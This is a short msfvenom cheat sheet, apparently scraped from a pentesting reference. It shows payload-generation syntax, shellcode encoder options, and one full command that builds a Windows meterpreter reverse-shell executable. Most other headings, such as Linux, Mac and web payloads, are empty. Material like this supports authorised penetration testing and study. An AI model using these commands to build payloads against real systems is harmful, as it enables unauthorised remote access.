MSFVenom - CheatSheet

msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>

One can also use the -a to specify the architecture or the --platform

Listing

msfvenom -l #Payloads
msfvenom -l encoders #Encoders

Common params when creating a shellcode

-b "\x00\x0a\x0d" 
-f c 
-e x86/shikata_ga_nai -i 5 
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID

Windows

Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

Bind Shell

Create User

CMD Shell

Execute Command (powershell nishang)

Encoder

Embedded inside executable

Linux Payloads

Reverse Shell

Bind Shell

SunOS (Solaris)

MAC Payloads

Reverse Shell:

Bind Shell

Web Based Payloads

PHP

Reverse shell

ASP/x

Reverse shell

JSP

Reverse shell

WAR

Reverse Shell

NodeJS

Script Language payloads

Perl

Python

Bash

****

最后更新于